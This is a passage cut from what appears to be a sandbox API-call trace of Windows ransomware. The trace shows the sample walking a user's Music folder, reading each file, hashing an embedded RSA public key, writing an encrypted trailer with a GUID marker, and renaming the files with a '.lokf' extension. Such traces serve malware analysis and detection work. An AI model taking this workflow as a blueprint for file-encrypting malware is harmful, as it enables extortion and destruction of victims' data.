HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c8bae8 | out: hHeap=0x660000) returned 1 [0060.795] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x4703, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.795] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.795] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0060.795] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0060.795] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0060.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0060.796] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x32947b0 [0060.796] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.796] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0060.796] WriteFile (in: hFile=0x5cc, lpBuffer=0x32947b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x32947b0*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0060.796] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.796] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.796] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.796] CloseHandle (hObject=0x5cc) returned 1 [0060.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290508 [0060.797] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0060.797] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290508 | out: hHeap=0x660000) returned 1 [0060.797] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\5t8t.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\eakifit9ecot40tbvqp\\5t8t.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\5t8t.wav.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\eakifit9ecot40tbvqp\\5t8t.wav.lokf")) returned 1 [0060.797] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.797] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.797] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.798] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44d41c60, ftCreationTime.dwHighDateTime=0x1d4c9a7, ftLastAccessTime.dwLowDateTime=0x37649410, ftLastAccessTime.dwHighDateTime=0x1d4d04b, ftLastWriteTime.dwLowDateTime=0x37649410, ftLastWriteTime.dwHighDateTime=0x1d4d04b, nFileSizeHigh=0x0, nFileSizeLow=0xd18c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JL4xlRSqNe-Wd jJpi9J.wav", cAlternateFileName="JL4XLR~1.WAV")) returned 1 [0060.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xee) returned 0x329e1f0 [0060.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.798] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\JL4xlRSqNe-Wd jJpi9J.wav") returned=".wav" [0060.799] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\JL4xlRSqNe-Wd jJpi9J.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\eakifit9ecot40tbvqp\\jl4xlrsqne-wd jjpi9j.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.799] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=53644) returned 1 [0060.799] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.802] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xd166, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.802] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.802] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.802] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.802] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xd18c, lpOverlapped=0x0) returned 1 [0060.803] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.803] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.803] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.803] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.803] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b87a8) returned 1 [0060.804] CryptCreateHash (in: hProv=0x6b87a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.804] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.804] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.804] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.804] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.804] GetLastError () returned 0x0 [0060.804] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.804] CryptReleaseContext (hProv=0x6b87a8, dwFlags=0x0) returned 1 [0060.804] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.804] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.804] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.804] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.804] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.804] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.804] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.804] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd190) returned 0x9c8bae8 [0060.804] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0060.804] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.804] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0060.804] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.804] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0060.804] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c899e8 [0060.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85ff8 [0060.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c89a30 [0060.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86010 [0060.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86040 [0060.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86058 [0060.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0060.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0060.805] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.805] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86040 | out: hHeap=0x660000) returned 1 [0060.805] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86058 | out: hHeap=0x660000) returned 1 [0060.805] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.805] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.805] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278ec0 [0060.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86058 [0060.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0060.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c86040 [0060.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0060.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0060.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0060.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.805] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.805] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86058 | out: hHeap=0x660000) returned 1 [0060.805] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.805] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86040 | out: hHeap=0x660000) returned 1 [0060.805] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.806] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.806] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.806] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.806] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0060.806] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.806] GetCurrentThreadId () returned 0x9e0 [0060.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0060.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8b840 [0060.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b87a8 [0060.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0060.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.806] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.806] GetCurrentThreadId () returned 0x9e0 [0060.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.806] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e2e8 [0060.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.806] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.806] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.806] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e2e8 | out: hHeap=0x660000) returned 1 [0060.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0060.806] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.806] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0060.807] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0060.807] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0060.807] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.807] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.807] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.807] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86040 [0060.807] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.807] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0060.807] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.807] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xd18c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.807] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.807] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0060.807] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.807] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.808] CloseHandle (hObject=0x5cc) returned 1 [0060.809] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\JL4xlRSqNe-Wd jJpi9J.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\eakifit9ecot40tbvqp\\jl4xlrsqne-wd jjpi9j.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\JL4xlRSqNe-Wd jJpi9J.wav.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\eakifit9ecot40tbvqp\\jl4xlrsqne-wd jjpi9j.wav.lokf")) returned 1 [0060.809] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0060.809] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.809] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.810] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.810] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86166620, ftCreationTime.dwHighDateTime=0x1d4d464, ftLastAccessTime.dwLowDateTime=0x608ae860, ftLastAccessTime.dwHighDateTime=0x1d4cb52, ftLastWriteTime.dwLowDateTime=0x608ae860, ftLastWriteTime.dwHighDateTime=0x1d4cb52, nFileSizeHigh=0x0, nFileSizeLow=0xe109, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KnXQ3aRo433TX.m4a", cAlternateFileName="KNXQ3A~1.M4A")) returned 1 [0060.810] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\KnXQ3aRo433TX.m4a") returned=".m4a" [0060.810] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\KnXQ3aRo433TX.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\eakifit9ecot40tbvqp\\knxq3aro433tx.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.810] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=57609) returned 1 [0060.810] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.813] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe0e3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.813] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.814] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xe109, lpOverlapped=0x0) returned 1 [0060.814] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.814] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.814] lstrlenA (lpString="-----BEGIN PUBLIC 